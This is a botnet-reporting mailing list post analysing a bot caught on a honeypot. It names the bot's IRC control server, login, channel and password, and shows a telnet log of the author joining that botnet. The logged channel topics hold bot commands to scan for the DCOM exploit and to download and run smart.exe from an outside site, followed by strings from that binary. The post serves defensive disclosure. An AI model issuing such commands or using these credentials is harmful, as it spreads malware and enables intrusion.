[botnets] botnetserver: online.ircstyle.net

[lordandrej]

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Hi,
today we received lsass.exe (cc95b4224748a4886daa78487a40b8ed) on our  
honeypot. According to norman.com it connects to the following botnet:

[ Network services ]
     * Looks for an Internet connection.
     * Connects to "online.ircstyle.net" on port 6667 (TCP).
     * Connects to IRC server.
     * IRC: Uses nickname GurL80340024.
     * IRC: Uses username ezkieyacag.
     * IRC: Joins channel ##rrxx with password li.
     * IRC: Sets the usermode for user GurL80340024 to -x+B.


## joining the party with telnet (BitchX was blocked)
telnet online.ircstyle.net 6667
Trying 80.195.235.18...
Connected to online.ircstyle.net.
Escape character is '^]'.
user ezkieyacag hub.57614.com hub.57614.com :Dont
nick GurL80340024
:hub.57614.com 001 GurL80340024 :GurL, [EMAIL PROTECTED]
:hub.57614.com 005 GurL80340024 MAP KNOCK SAFELIST HCN MAXCHANNELS=8  
MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15  
AWAYLEN=307 :are supported by this server
:hub.57614.com 005 GurL80340024 WALLCHOPS WATCH=128 SILENCE=15  
MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+  
CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurL  
CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
:GurL80340024 MODE GurL80340024 :+iRp
join ##rrxx li
:[EMAIL PROTECTED] JOIN :##rrxx
:hub.57614.com 332 GurL80340024 ##rrxx :;raw join ##lscan,##lmon
:hub.57614.com 333 GurL80340024 ##rrxx always 1141759867
:hub.57614.com 353 GurL80340024 @ ##rrxx :GurL80340024
:hub.57614.com 366 GurL80340024 ##rrxx :End of /NAMES list.
mode GurL80340024 to -x+B
join ##lscan
:[EMAIL PROTECTED] JOIN :##lscan
:hub.57614.com 332 GurL80340024 ##lscan :;advscan dcom135 150 5 0 -r -s
:hub.57614.com 333 GurL80340024 ##lscan always 1141759856
:hub.57614.com 353 GurL80340024 @ ##lscan :GurL80340024
:hub.57614.com 366 GurL80340024 ##lscan :End of /NAMES list.
join ##lmon
:[EMAIL PROTECTED] JOIN :##lmon
:hub.57614.com 332 GurL80340024 ##lmon :;download http:// 
www.darkblueroom.com/smart.exe c:\smart.exe 1 -s
:hub.57614.com 333 GurL80340024 ##lmon always 1141759839
:hub.57614.com 353 GurL80340024 @ ##lmon :GurL80340024
:hub.57614.com 366 GurL80340024 ##lmon :End of /NAMES list.


## strings of smart.exe:
strings smart.exe
Project1
Form1
Form1
Form1
VB5!
Project1
Project1
Project1
Project1
Form1
Y":O
Form
c:\program files\microsoft visual studio\vb98\VB6.OLB
wininet.dll
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
Download
VBA6.DLL
...

No ISP is notified yet

cheers
andrej
_______________________________________________
botnets mailing list
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets